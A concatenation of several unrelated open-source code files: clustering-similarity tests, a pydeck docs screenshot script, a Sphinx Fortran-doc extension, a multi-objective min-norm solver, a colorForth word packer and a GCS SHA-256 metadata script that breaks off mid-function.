body_str = self.get_new_issue_body(update_block, operate=operate, issues=issues)
if not body_str:
logger.error(
"after update issue description, got empty new release issue body.")
return False
return True if self.update_issue(body=body_str) else False
def count_issue_status(self):
"""
statistics of the status of all issues
Returns:
true: the status of all issue is completed
false: there is an unfinished issue
"""
try:
body = self.get_issue_body(self.issue_num)
# obtain the issue number under installation, compilation and bugfix
install_build_issues, bugfix_issues, _ = self._get_install_build_bugfix_issue_id(body)
issues = install_build_issues + bugfix_issues
unfinished_issues = []
if not issues:
logger.info("no issue in install_build and bugfix block.")
return True
# traverse all issues, get the status of the issue,
# and add the unfinished ones to the unfinished list
for issue_number in issues:
issue_content = self.get_issue_info(issue_number)
if not issue_content:
logger.error("failed to get the issue info of %s. " % issue_number)
continue
if issue_content.get("issue_state") != "已完成":
unfinished_issues.append(issue_number)
if unfinished_issues:
logger.info("The following issue status is not complete %s" % ",".join(unfinished_issues))
return False
except (ValueError, TypeError) as error:
logger.error("an error occurred while counting the status of the issue. "
"The error is %s" % error)
return False
return True
@staticmethod
def release_announcement(user_name, password):
"""
release announcement
Args:
user_name: user name
password: password
Returns:
return true on success, false on failure
"""
try:
response = requests.post(RELEASE_URL, data={"username": user_name,
"password": password})
if response.status_code == 200:
if "successfully" in json.loads(response.text):
logger.info("release announcement successfully")
return True
logger.error(response.text)
return False
logger.error("failed to request the announcement address: %s ,"
"because of the response status code is %s "
"response body is %s " % (RELEASE_URL, response.status_code, response.text))
return False
except (requests.RequestException, AttributeError, json.JSONDecodeError) as error:
logger.error("failed to request the announcement address: %s ,"
"because of %s" % (RELEASE_URL, error))
return False
def operate_release_issue(self, *args, operation="init", operate_block=None, issues=None):
"""
modify entrance of the release issue
Args:
operation: {init,add,delete}
operate_block: block to operate
when the operation is "init", operate_block=None
issues: issue list
Returns:
True or False
"""
try:
if operation == "init":
return self.init_issue_description(*args)
else:
return self.update_issue_description(
operate=operation, update_block=operate_block, issues=issues
)
except ValueError as e:
logger.error(e)
return False
| 1.820313 | 2 |
tests/sim_tests.py | yy/clusim | 2 | 12789313 | # -*- coding: utf-8 -*-
#
# Tests for ``sim.py``
# These tests were hand calculated by <NAME>: <EMAIL>
#
from clusim.clustering import Clustering
import clusim.sim as sim
from clusim.dag import DAG
import clusim.clusimelement as clusimelement
from numpy.testing import assert_approx_equal
from numpy import mean
def test_comparison_example():
c1_elm2clu_dict = {0: [0], 1: [1], 2: [1], 3: [0], 4: [2], 5: [1]}
c2_elm2clu_dict = {0: [0], 1: [1], 2: [1], 3: [0], 4: [2], 5: [2]}
c1 = Clustering(elm2clu_dict=c1_elm2clu_dict)
c2 = Clustering(elm2clu_dict=c2_elm2clu_dict)
N11, N10, N01, N00 = sim.count_pairwise_cooccurence(c1, c2)
    assert N11 == 2, "Element Co-occurrence count for N11 does not match. %s != %s" % (N11, 2)
    assert N10 == 2, "Element Co-occurrence count for N10 does not match. %s != %s" % (N10, 2)
    assert N01 == 1, "Element Co-occurrence count for N01 does not match. %s != %s" % (N01, 1)
    assert N00 == 10, "Element Co-occurrence count for N00 does not match. %s != %s" % (N00, 10)
known_sim_values = {'jaccard_index': 0.4,
'rand_index': 0.8,
'fowlkes_mallows_index': 0.5773502691896258,
'rogers_tanimoto_index': 2./3.,
'southwood_index': 2./3.,
'czekanowski_index': 0.5714285714285714,
'dice_index': 0.5714285714285714,
'sorensen_index': 0.5714285714285714,
'pearson_correlation': 0.011363636363636364,
'classification_error': 0.16666666666666674,
'purity_index': 0.8333333333333333,
'fmeasure': 0.5714285714285714,
'nmi': 0.7396673768007593,
'vi': 0.792481250360578,
'geometric_accuracy': 0.8333333333333334,
'overlap_quality': 0.0,
'onmi': 0.7449589906475155,
'omega_index': 0.44444444444444453
}
for simfunc in sim.available_similarity_measures:
simvalue = eval('sim.' + simfunc+'(c1, c2)')
assert simvalue == known_sim_values[simfunc], "Similarity Measure %s does not match. %s != %s" % (simfunc, simvalue, known_sim_values[simfunc])
def test_model_example():
c1_elm2clu_dict = {0: [0], 1: [1], 2: [1], 3: [0]}
c2_elm2clu_dict = {0: [0], 1: [1], 2: [1], 3: [1]}
c1 = Clustering(elm2clu_dict=c1_elm2clu_dict)
c2 = Clustering(elm2clu_dict=c2_elm2clu_dict)
known_rand_values = {'perm': 0.5,
'perm1': 0.5,
'num': 0.510204081632653,
'num1': 0.5,
'all': 0.555555555555556,
'all1': 0.5
}
known_mi_values = {'perm': 0.311278124459133,
'perm1': 0.311278124459133,
'num': 0.309927805548467,
'num1': 0.301825892084476,
'all': 0.611635721962606,
'all1': 0.419448541053684
}
for rdm in sim.available_random_models:
exp_rand_value = sim.expected_rand_index(n_elements=c1.n_elements,
n_clusters1=c1.n_clusters,
n_clusters2=c2.n_clusters,
clu_size_seq1=c1.clu_size_seq,
clu_size_seq2=c2.clu_size_seq,
random_model=rdm
)
assert_approx_equal(exp_rand_value, known_rand_values[rdm], 10**(-10), "Expected Rand Index with %s Random Model does not match. %s != %s" % (rdm, exp_rand_value, known_rand_values[rdm]))
exp_mi_value = sim.expected_mi(n_elements=c1.n_elements,
n_clusters1=c1.n_clusters,
n_clusters2=c2.n_clusters,
clu_size_seq1=c1.clu_size_seq,
clu_size_seq2=c2.clu_size_seq,
random_model=rdm,
logbase=2.)
assert_approx_equal(exp_mi_value, known_mi_values[rdm], 10**(-10), "Expected MI with %s Random Model does not match. %s != %s" % (rdm, exp_mi_value, known_mi_values[rdm]) )
def test_elementsim_example():
# taken from Fig 3 of Gates et al (2018) Scientific Reports
# overlapping clustering
c1_elm2clu_dict = {0: [0], 1: [0], 2: [0], 3: [1], 4: [1], 5: [1, 2], 6: [2]}
# hierarchical clustering
c2_elm2clu_dict = {0: [1], 1: [1], 2: [2], 3: [5], 4: [5], 5: [6, 8], 6: [9]}
c2_dag = DAG()
c2_dag.add_edges_from([(0, 1), (0, 2), (3, 4), (4, 5), (4, 6), (3, 7), (7, 8), (7, 9)])
c1 = Clustering(elm2clu_dict=c1_elm2clu_dict)
c2 = Clustering(elm2clu_dict=c2_elm2clu_dict, hier_graph=c2_dag)
known_elsim = [0.92875658, 0.92875658, 0.85751315, 0.25717544, 0.74282456, 0.82083876, 0.80767074]
elsim, ellabels = clusimelement.element_sim_elscore(c1, c2, alpha=0.9, r=1., r2=None, rescale_path_type='max')
for i in range(7):
assert_approx_equal(elsim[i], known_elsim[i], 10**(-10), "Element-centric similarity for element %s does not match. %s != %s" % (i, elsim[i], known_elsim[i]) )
if __name__ == "__main__":
test_comparison_example()
test_model_example()
test_elementsim_example()
| 2.390625 | 2 |
bindings/pydeck/examples/scripts/update_docs.py | wuweiweiwu/deck.gl | 0 | 12789314 | <gh_stars>0
import asyncio
import glob
import os
from pyppeteer import launch
here = os.path.dirname(os.path.abspath(__file__))
parent_directory = os.path.join(here, "..")
os.chdir(here)
example_glob = os.path.join(parent_directory, "*_layer.py")
async def run(cmd):
"""Runs a shell command within asyncio"""
proc = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await proc.communicate()
print(f"[info] {cmd!r} exited with {proc.returncode}")
if stdout:
print(f"[stdout]\n{stdout.decode()}")
if stderr:
print(f"[stderr]\n{stderr.decode()}")
async def main():
for fname in glob.glob(example_glob):
browser = await launch(
autoClose=False,
headless=False,
args=["--no-sandbox", "--disable-web-security"],
)
page = await browser.newPage()
print("[info] Converting %s to an image" % fname)
await run(" ".join(["python", fname]))
png_fname = os.path.splitext(fname)[0] + ".png"
html_fname = os.path.join(
here, os.path.splitext(os.path.basename(fname))[0] + ".html"
)
fpath = "file://%s" % html_fname
if "bitmap_layer" in html_fname or "icon_layer" in html_fname:
await page.goto(fpath)
await asyncio.sleep(10)
else:
await page.goto(
fpath,
waitUntil=["load", "networkidle2", "networkidle0"],
timeout=30000,
)
await page.screenshot({"path": png_fname})
        print("[info] Successfully converted %s to a png at %s" % (fname, png_fname))
await browser.close()
if __name__ == "__main__":
asyncio.get_event_loop().run_until_complete(main())
| 2.578125 | 3 |
tests/test_recursiveDecompression.py | zomry1/Hystrix-Box | 7 | 12789315 | from HystrixBox.Tools.recursiveDecompression import extract_recursive
import filecmp
import os
TEST1 = '''File not found\n'''
TEST2 = '''Not a zip file or corrupted zip file\n'''
def compareDir(dir1, dir2):
"""
Compare two directory trees content.
Return False if they differ, True is they are the same.
"""
compared = filecmp.dircmp(dir1, dir2)
if (compared.left_only or compared.right_only or compared.diff_files
or compared.funny_files):
return False
for subdir in compared.common_dirs:
if not compareDir(os.path.join(dir1, subdir), os.path.join(dir2, subdir)):
return False
return True
def test_extract_recursive_true(tmpdir):
path = tmpdir.strpath
extract_recursive('../examples/recursivezip.zip', path)
assert compareDir(path, '../examples/RecursiveZipExtracted/')
def test_extract_recursive_1layer(tmpdir):
path = tmpdir.strpath
extract_recursive('../examples/root.zip', path)
assert compareDir(path, '../examples/RecursiveZipExtracted/1Introduction/2Introduction/3Introduction')
def test_extract_recursive_noFile(capfd, tmpdir):
path = tmpdir.strpath
extract_recursive('', path)
out, err = capfd.readouterr()
assert (out == TEST1)
def test_extract_recursive_noZipFile(capfd, tmpdir):
path = tmpdir.strpath
extract_recursive('../examples/extractor.txt', path)
out, err = capfd.readouterr()
assert (out == TEST2)
| 2.65625 | 3 |
doc/ext/genfortran.py | VACUMM/xoa | 7 | 12789316 | """Generate files to declare fortran functions"""
import os
import re
import logging
import importlib
from docutils.statemachine import string2lines
from sphinx.util.docutils import SphinxDirective
path_pat_mod_dir = os.path.join("{gendir}", "{mod_name}")
path_pat_mod_file = os.path.join(path_pat_mod_dir, "index.rst")
path_pat_func_file = os.path.join(path_pat_mod_dir, "{func_name}.rst")
def checkdir(path):
pdir = os.path.dirname(path)
if not os.path.exists(pdir):
os.makedirs(pdir)
class GenFortran(SphinxDirective):
has_content = True
def run(self):
if not self.content:
return []
# Loop on modules and descriptions
rst_toctree = ".. toctree::\n\t:hidden:\n\n"
rst_table = ".. list-table::\n\n"
for mod_name_desc in self.content:
smod = mod_name_desc.split(" ")
mod_name = smod[0]
mod_desc = " ".join(smod[1:])
rst_toctree += f"\tgenfortran/{mod_name}/index\n"
rst_table += f"\t* - :mod:`{mod_name}`\n"
rst_table += f"\t - {mod_desc}\n"
# Insert toctree and tables
rst_all = rst_toctree + "\n\n" + rst_table + "\n"
source = self.state_machine.input_lines.source(
self.lineno - self.state_machine.input_offset - 1)
include_lines = string2lines(rst_all, convert_whitespace=1)
self.state_machine.insert_input(include_lines, source)
return []
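# Hedged usage sketch (the module name and description are placeholders): in a
# source .rst file the directive is written as
#
#   .. genfortran::
#
#       mypkg._fortran_core Low-level Fortran kernels
#
# and expands into a hidden toctree entry plus a name/description list-table.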
re_directive_match = re.compile(
r"^(?P<indent>\s*)\.\.\s+genfortran::\s*\n$").match
re_indent_match = re.compile(r"^(?P<indent>\s*)\S.+\n$").match
def generate_stub_files(srcdir, mod_name, mod_desc):
gendir = os.path.join(srcdir, "genfortran")
    logging.info(f"Generating rst files for fortran wrapper {mod_name}")
mod_content = importlib.import_module(mod_name)
func_names = [func for func in dir(mod_content)
if not func.startswith('_')]
# Write files
mod_dir = path_pat_mod_dir.format(**locals())
if not os.path.exists(mod_dir):
os.makedirs(mod_dir)
mod_file = path_pat_mod_file.format(**locals())
with open(mod_file, "w") as f:
f.write(mod_name + "\n" + len(mod_name)*"=" + "\n\n")
f.write(mod_desc + "\n\n")
f.write(f".. module:: {mod_name}\n\n")
rst_table = ".. list-table::\n\n"
rst_toctree = ".. toctree::\n\t:hidden:\n\n"
for func_name in func_names:
rst_table += f"\t* - :func:`{mod_name}.{func_name}`\n"
func = getattr(mod_content, func_name)
func_sig = func.__doc__.split("\n")[0]
rst_table += f"\t - {func_sig}\n"
rst_toctree += f"\t{func_name}\n"
with open(path_pat_func_file.format(
**locals()), "w") as ff:
ff.write(func_name+"\n"+len(func_name)*"="+"\n\n")
ff.write(f".. currentmodule:: {mod_name}\n\n")
out, call = func_sig.split('=')
ff.write(f".. autofunction:: {call}\n\n")
f.write(rst_toctree+"\n\n")
f.write(rst_table)
def parse_and_generate(app):
"""Parse rst files to find directives and generate stub files"""
# Get file list
env = app.builder.env
srcdir = env.srcdir
if app.config.genfortran_src_files:
srcfiles = [os.path.join(srcdir, srcfile) for srcfile
in app.config.genfortran_src_files]
else:
env = app.builder.env
srcfiles = [env.doc2path(x, base=None) for x in env.found_docs
if os.path.isfile(env.doc2path(x))]
# Parse files
for srcfile in srcfiles:
if not os.path.exists(srcfile):
logging.warning("[genfortran] file not found: "+srcfile)
continue
with open(srcfile) as f:
indent = None
for line in f:
m = re_directive_match(line)
if m:
indent = m.group('indent')
continue
if indent is None:
continue
m = re.match("^"+indent + r"\s+(?P<mod_name>[\w.]+)" +
r"(?P<mod_desc>\s.*)\n$", line)
if m:
generate_stub_files(
srcdir, m.group("mod_name"),
m.group("mod_desc").strip())
continue
m = re_indent_match(line)
if m and len(m.group('indent')) <= len(indent):
indent = None
def setup(app):
app.add_directive("genfortran", GenFortran)
app.connect('builder-inited', parse_and_generate)
app.add_config_value('genfortran_src_files', [], [], [list])
return {'version': '0.1'}
| 2.421875 | 2 |
src/Methods/DataFromManyPersons/Univariate/__init__.py | syncpy/SyncPy | 20 | 12789317 | <gh_stars>10-100
"""
This package allows to compute synchronisation between monovariate signals gathered
from many persons.
"""
__all__ = ['Categorical', 'Continuous']
| 1.070313 | 1 |
mo_optimizers/min_norm_solvers.py | timodeist/multi_objective_learning | 0 | 12789318 | <reponame>timodeist/multi_objective_learning
"""
This code is taken from the repository accompanying the manuscript
Sener, Ozan, and <NAME>.
"Multi-task learning as multi-objective optimization."
arXiv preprint arXiv:1810.04650 (2018).
Neural Information Processing Systems (NeurIPS) 2018
https://github.com/intel-isl/MultiObjectiveOptimization
MIT License
Copyright (c) 2018 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import numpy as np
import torch
class MinNormSolver:
MAX_ITER = 250
STOP_CRIT = 1e-5
def _min_norm_element_from2(v1v1, v1v2, v2v2):
"""
Analytical solution for min_{c} |cx_1 + (1-c)x_2|_2^2
d is the distance (objective) optimzed
v1v1 = <x1,x1>
v1v2 = <x1,x2>
v2v2 = <x2,x2>
"""
if v1v2 >= v1v1:
# Case: Fig 1, third column
gamma = 0.999
cost = v1v1
return gamma, cost
if v1v2 >= v2v2:
# Case: Fig 1, first column
gamma = 0.001
cost = v2v2
return gamma, cost
# Case: Fig 1, second column
gamma = -1.0 * ( (v1v2 - v2v2) / (v1v1+v2v2 - 2*v1v2) )
cost = v2v2 + gamma*(v1v2 - v2v2)
return gamma, cost
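    # Hedged worked example (numbers are made up): with <x1,x1>=4, <x1,x2>=1 and
    # <x2,x2>=2 neither clipping branch fires, so
    #   gamma = -(1 - 2) / (4 + 2 - 2*1) = 0.25
    #   cost  = 2 + 0.25 * (1 - 2)       = 1.75
    # i.e. MinNormSolver._min_norm_element_from2(4.0, 1.0, 2.0) -> (0.25, 1.75).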
def _min_norm_2d(vecs, dps):
"""
Find the minimum norm solution as combination of two points
This is correct only in 2D
ie. min_c |\sum c_i x_i|_2^2 st. \sum c_i = 1 , 1 >= c_1 >= 0 for all i, c_i + c_j = 1.0 for some i, j
"""
# computes dot products of gradient vectors and applies Algorithm 1 as shown in Sener and Koltun (2018)
dmin = 1e8
for i in range(len(vecs)):
for j in range(i+1,len(vecs)):
if (i,j) not in dps:
dps[(i, j)] = 0.0
for k in range(len(vecs[i])):
dps[(i,j)] += torch.dot(vecs[i][k], vecs[j][k]).item()#torch.dot(vecs[i][k], vecs[j][k]).data[0]
dps[(j, i)] = dps[(i, j)]
if (i,i) not in dps:
dps[(i, i)] = 0.0
for k in range(len(vecs[i])):
dps[(i,i)] += torch.dot(vecs[i][k], vecs[i][k]).item()#torch.dot(vecs[i][k], vecs[i][k]).data[0]
if (j,j) not in dps:
dps[(j, j)] = 0.0
for k in range(len(vecs[i])):
dps[(j, j)] += torch.dot(vecs[j][k], vecs[j][k]).item()#torch.dot(vecs[j][k], vecs[j][k]).data[0]
c,d = MinNormSolver._min_norm_element_from2(dps[(i,i)], dps[(i,j)], dps[(j,j)])
if d < dmin:
dmin = d
                    # sol contains the pair of vectors, the selected gamma weight and some cost (I don't understand why they matter)
sol = [(i,j),c,d]
return sol, dps
def _projection2simplex(y):
"""
Given y, it solves argmin_z |y-z|_2 st \sum z = 1 , 1 >= z_i >= 0 for all i
"""
m = len(y)
sorted_y = np.flip(np.sort(y), axis=0)
tmpsum = 0.0
tmax_f = (np.sum(y) - 1.0)/m
for i in range(m-1):
tmpsum+= sorted_y[i]
tmax = (tmpsum - 1)/ (i+1.0)
if tmax > sorted_y[i+1]:
tmax_f = tmax
break
return np.maximum(y - tmax_f, np.zeros(y.shape))
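    # Hedged example (values are made up): projecting y = [0.6, 0.8] onto the
    # probability simplex shifts both entries by tmax_f = 0.2, giving [0.4, 0.6],
    # which is non-negative and sums to 1 as required.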
def _next_point(cur_val, grad, n):
proj_grad = grad - ( np.sum(grad) / n )
tm1 = -1.0*cur_val[proj_grad<0]/proj_grad[proj_grad<0]
tm2 = (1.0 - cur_val[proj_grad>0])/(proj_grad[proj_grad>0])
skippers = np.sum(tm1<1e-7) + np.sum(tm2<1e-7)
t = 1
if len(tm1[tm1>1e-7]) > 0:
t = np.min(tm1[tm1>1e-7])
if len(tm2[tm2>1e-7]) > 0:
t = min(t, np.min(tm2[tm2>1e-7]))
next_point = proj_grad*t + cur_val
next_point = MinNormSolver._projection2simplex(next_point)
return next_point
def find_min_norm_element(vecs):
"""
Given a list of vectors (vecs), this method finds the minimum norm element in the convex hull
as min |u|_2 st. u = \sum c_i vecs[i] and \sum c_i = 1.
It is quite geometric, and the main idea is the fact that if d_{ij} = min |u|_2 st u = c x_i + (1-c) x_j; the solution lies in (0, d_{i,j})
Hence, we find the best 2-task solution, and then run the projected gradient descent until convergence
"""
# Solution lying at the combination of two points
dps = {}
init_sol, dps = MinNormSolver._min_norm_2d(vecs, dps)
# n is the number of vectors fed into the functions.
# if all networks are in their assigned subregion, only the loss gradients are given as input and n is equal to the number of losses.
# if some networks are not in their assigned subregion then all loss gradients AND and gradients constraint correction \Nabla G are given as input
n=len(vecs)
sol_vec = np.zeros(n)
# init_sol[0] contains the indices of the losses for which the weight gamma (init_sol[1]) was determined so that the resulting convex combination of loss gradients (gamma * loss_grad + (1-gamma) * other_loss_grad) has minimum norm
# sol_vec contains the weights gamma and (1-gamma) in the order of the function input vecs (which is the list of loss gradients and constraint correction gradients)
sol_vec[init_sol[0][0]] = init_sol[1]
sol_vec[init_sol[0][1]] = 1 - init_sol[1]
if n < 3:
# This is optimal for n=2, so return the solution
return sol_vec , init_sol[2]
# if there are more than 2 vectors in the input, then run projected gradient descent (?)
iter_count = 0
# create matrix of dot products previously computed
grad_mat = np.zeros((n,n))
for i in range(n):
for j in range(n):
grad_mat[i,j] = dps[(i, j)]
while iter_count < MinNormSolver.MAX_ITER:
grad_dir = -1.0*np.dot(grad_mat, sol_vec)
new_point = MinNormSolver._next_point(sol_vec, grad_dir, n)
# Re-compute the inner products for line search
v1v1 = 0.0
v1v2 = 0.0
v2v2 = 0.0
for i in range(n):
for j in range(n):
v1v1 += sol_vec[i]*sol_vec[j]*dps[(i,j)]
v1v2 += sol_vec[i]*new_point[j]*dps[(i,j)]
v2v2 += new_point[i]*new_point[j]*dps[(i,j)]
nc, nd = MinNormSolver._min_norm_element_from2(v1v1, v1v2, v2v2)
new_sol_vec = nc*sol_vec + (1-nc)*new_point
change = new_sol_vec - sol_vec
if np.sum(np.abs(change)) < MinNormSolver.STOP_CRIT:
return sol_vec, nd
sol_vec = new_sol_vec
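    # Hedged usage sketch (tensors are invented): vecs is a list with one entry per
    # task, each entry being that task's list of per-parameter gradient tensors.
    #   g1 = [torch.tensor([1.0, 0.0])]
    #   g2 = [torch.tensor([0.0, 1.0])]
    #   sol, cost = MinNormSolver.find_min_norm_element([g1, g2])
    # For these orthogonal unit gradients the two-task shortcut returns
    # sol = [0.5, 0.5] and cost = 0.5.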
def find_min_norm_element_FW(vecs):
"""
Given a list of vectors (vecs), this method finds the minimum norm element in the convex hull
as min |u|_2 st. u = \sum c_i vecs[i] and \sum c_i = 1.
It is quite geometric, and the main idea is the fact that if d_{ij} = min |u|_2 st u = c x_i + (1-c) x_j; the solution lies in (0, d_{i,j})
Hence, we find the best 2-task solution, and then run the Frank Wolfe until convergence
"""
# Solution lying at the combination of two points
dps = {}
init_sol, dps = MinNormSolver._min_norm_2d(vecs, dps)
n=len(vecs)
sol_vec = np.zeros(n)
sol_vec[init_sol[0][0]] = init_sol[1]
sol_vec[init_sol[0][1]] = 1 - init_sol[1]
if n < 3:
# This is optimal for n=2, so return the solution
return sol_vec , init_sol[2]
iter_count = 0
grad_mat = np.zeros((n,n))
for i in range(n):
for j in range(n):
grad_mat[i,j] = dps[(i, j)]
while iter_count < MinNormSolver.MAX_ITER:
t_iter = np.argmin(np.dot(grad_mat, sol_vec))
v1v1 = np.dot(sol_vec, np.dot(grad_mat, sol_vec))
v1v2 = np.dot(sol_vec, grad_mat[:, t_iter])
v2v2 = grad_mat[t_iter, t_iter]
nc, nd = MinNormSolver._min_norm_element_from2(v1v1, v1v2, v2v2)
new_sol_vec = nc*sol_vec
new_sol_vec[t_iter] += 1 - nc
change = new_sol_vec - sol_vec
if np.sum(np.abs(change)) < MinNormSolver.STOP_CRIT:
return sol_vec, nd
sol_vec = new_sol_vec
def gradient_normalizers(grads, losses, normalization_type):
gn = {}
if normalization_type == 'l2':
for t in grads:
gn[t] = np.sqrt(np.sum([gr.pow(2).sum().data[0] for gr in grads[t]]))
elif normalization_type == 'loss':
for t in grads:
gn[t] = losses[t]
elif normalization_type == 'loss+':
for t in grads:
gn[t] = losses[t] * np.sqrt(np.sum([gr.pow(2).sum().data[0] for gr in grads[t]]))
elif normalization_type == 'none':
for t in grads:
gn[t] = 1.0
else:
print('ERROR: Invalid Normalization Type')
return gn | 1.25 | 1 |
tools/pack.py | sts-q/Einherjar | 20 | 12789319 | #!/usr/bin/env python
# Copyright (c) <NAME>.
# All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import sys
code = ' rtoeani' + 'smcylgfw' + 'dvpbhxuq' + '01234567' + \
'89j-k.z/' + ';:!+@*,?'
asm_encodings = [
'__',
'_r',
'_t',
'_o',
'_e',
'_a',
'_n',
'_i',
'_s',
'_m',
'_c',
'_y',
'_l',
'_g',
'_f',
'_w',
'_d',
'_v',
'_p',
'_b',
'_h',
'_x',
'_u',
'_q',
'_0',
'_1',
'_2',
'_3',
'_4',
'_5',
'_6',
'_7',
'_8',
'_9',
'_j',
'_dash',
'_k',
'_dot',
'_z',
'_slash',
'_semi',
'_colon',
'_store',
'_plus',
'_fetch',
'_times',
'_comma',
'_question',
]
huffman_encodings = [
0b0000, #
0b0001, #r
0b0010, #t
0b0011, #o
0b0100, #e
0b0101, #a
0b0110, #n
0b0111, #i
0b10000, #s
0b10001, #m
0b10010, #c
0b10011, #y
0b10100, #l
0b10101, #g
0b10110, #f
0b10111, #w
0b1100000, #d
0b1100001, #v
0b1100010, #p
0b1100011, #b
0b1100100, #h
0b1100101, #x
0b1100110, #u
0b1100111, #q
0b1101000, #0
0b1101001, #1
0b1101010, #2
0b1101011, #3
0b1101100, #4
0b1101101, #5
0b1101110, #6
0b1101111, #7
0b1110000, #8
0b1110001, #9
0b1110010, #j
0b1110011, #-
0b1110100, #k
0b1110101, #.
0b1110110, #z
0b1110111, #/
0b1111000, #;
0b1111001, #:
0b1111010, #!
0b1111011, #+
0b1111100, #@
0b1111101, #*
0b1111110, #,
0b1111111, #?
]
highbit = 0x80000000L
mask = 0xffffffffL
def packword_num(word):
"""pack a word into a 32-bit integer like colorForth editor does
this routine ignores anything past 28 bits"""
packed, bits = 0, 28
for letter in word:
lettercode = code.index(letter)
length = 4 + (lettercode > 7) + (2 * (lettercode > 15)) # using True as 1
lettercode += (8 * (length == 5)) + ((96 - 16) * (length == 7)) # True=1
packed = (packed << length) + lettercode
bits -= length
packed <<= bits + 4
return packed
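# Hedged example (word chosen for illustration): packword_num('it') packs the
# 4-bit codes for 'i' (0b0111) and 't' (0b0010) into the top byte of a 32-bit
# word, giving 0x72000000.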
def packword(word):
"""pack a word into a 32-bit integer like colorForth editor does
this routine ignores anything past 28 bits"""
packed, bits = 0, 28
letter_codes = []
lengths = []
for i in range(0, len(word)):
letter = word[i]
#lettercode = huffman_encodings[code.index(letter)]
lettercode = code.index(letter)
length = 4 + (lettercode > 7) + (2 * (lettercode > 15)) # using True as 1
lettercode += (8 * (length == 5)) + ((96 - 16) * (length == 7)) # True=1
letter_codes.append(lettercode)
lengths.append(length)
packed = (packed << length) + lettercode
s = sum(lengths)
if s < 32:
coded_word = "(" * (len(word) - 1) + asm_encodings[code.index(word[0])]
i = 1
while i < len(word):
letter = word[i]
coded_asm_letter = asm_encodings[code.index(letter)]
displacement_for_this_letter = lengths[i]
coded_word += "<<" + str(displacement_for_this_letter) + "|" + coded_asm_letter + ")"
i = i+1
        coded_word += "<<" + str(32 - s)
        return coded_word
if __name__ == "__main__":
word = sys.argv[1]
packword(word)
packed = packword_num(word)
print "0x%x" % packed
| 1.78125 | 2 |
scripts/sha256_gcs_blobs.py | DataBiosphere/azul | 17 | 12789320 | <gh_stars>10-100
"""
Calculate the SHA-256 of Google Cloud Storage one or more blobs and write the
result as custom metadata to each blob.
"""
import argparse
import base64
import hashlib
import logging
import os
import sys
import tempfile
from typing import (
List,
Tuple,
)
from urllib import (
parse,
)
# PyCharm doesn't seem to recognize PEP 420 namespace packages
# noinspection PyPackageRequirements
import google.cloud.storage as gcs
from azul import (
reject,
require,
)
from azul.logging import (
configure_script_logging,
)
log = logging.getLogger(__name__)
class WriteCustomMetadata:
def main(self):
self._run()
exit_code = 0
return exit_code
@classmethod
def _parse_args(cls, argv):
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--source-area', '-s',
required=True,
help='The Google Cloud Storage URL of the source area. '
'Syntax is gs://<bucket>[/<path>].')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--blob-path', '-b',
action='append',
help='The path of a blob object relative to the source area. '
'Can be specified multiple times.')
group.add_argument('--all-blobs', '-B',
action='store_true', default=False,
help='Process all blobs contained within the source area')
parser.add_argument('--force', '-f',
action='store_true', default=False,
help='Force calculation of SHA256 if blob has an existing '
'custom metadata value and overwrite if different.')
args = parser.parse_args(argv)
return args
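    # Hedged CLI sketch (bucket and blob paths are placeholders, run from the repo root):
    #   python scripts/sha256_gcs_blobs.py --source-area gs://my-bucket/staging --all-blobs
    #   python scripts/sha256_gcs_blobs.py -s gs://my-bucket/staging -b blobs/abc -b blobs/def --force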
def __init__(self, argv: List[str]) -> None:
super().__init__()
self.args = self._parse_args(argv)
self.gcs = gcs.Client()
self.src_bucket, self.src_path = self._parse_gcs_url(self.args.source_area)
def _parse_gcs_url(self, gcs_url: str) -> Tuple[gcs.Bucket, str]:
"""
Parse a GCS URL into its Bucket and path components
"""
split_url = parse.urlsplit(gcs_url)
require(split_url.scheme == 'gs' and split_url.netloc,
'Google Cloud Storage URL must be in gs://<bucket>[/<path>] format')
reject(split_url.path.endswith('/'),
'Google Cloud Storage URL must not end with a "/"')
if split_url.path:
path = split_url.path.lstrip('/') + '/'
else:
path = ''
bucket = gcs.Bucket(self.gcs, split_url.netloc)
return bucket, path
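    # Hedged example (names are placeholders): _parse_gcs_url("gs://my-bucket/staging")
    # returns a Bucket for "my-bucket" together with the prefix "staging/"; a bare
    # "gs://my-bucket" yields an empty prefix, and a trailing "/" in the URL is rejected.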
def _run(self):
"""
Process each blob path given
"""
for blob in self.iterate_blobs():
log.info('Processing %s', blob.name)
self.write_blob_sha256(blob, self.args.force)
def iterate_blobs(self):
if self.args.all_blobs:
for blob in self.src_bucket.list_blobs(prefix=self.src_path):
yield blob
else:
for blob_path in self.args.blob_path:
yield self.get_blob(blob_path)
def write_blob_sha256(self, blob: gcs.Blob, force: bool = False) -> None:
"""
Calculates a blob's SHA256 and writes the value to the blob's custom
metadata 'sha256' field.
"""
current_value = None if blob.metadata is None else blob.metadata.get('sha256')
log.info('Current SHA256 value: %s', current_value)
if current_value is None or force:
file_sha256 = self.calculate_blob_sha256(blob)
if current_value == file_sha256:
log.info('Calculated SHA256 matches current value, no change.')
else:
log.info('Saving SHA256 value: %s', file_sha256)
blob.metadata = {'sha256': file_sha256}
blob.patch()
else:
log.info('Blob SHA256 not calculated or changed.')
def get_blob(self, blob_path: str) -> gcs.Blob:
"""
Return the blob from the source bucket.
"""
return self.src_bucket.get_blob(f'{self.src_path}{blob_path}')
def calculate_blob_sha256(self,
blob: gcs.Blob) -> str:
"""
Return the SHA256 for the given blob.
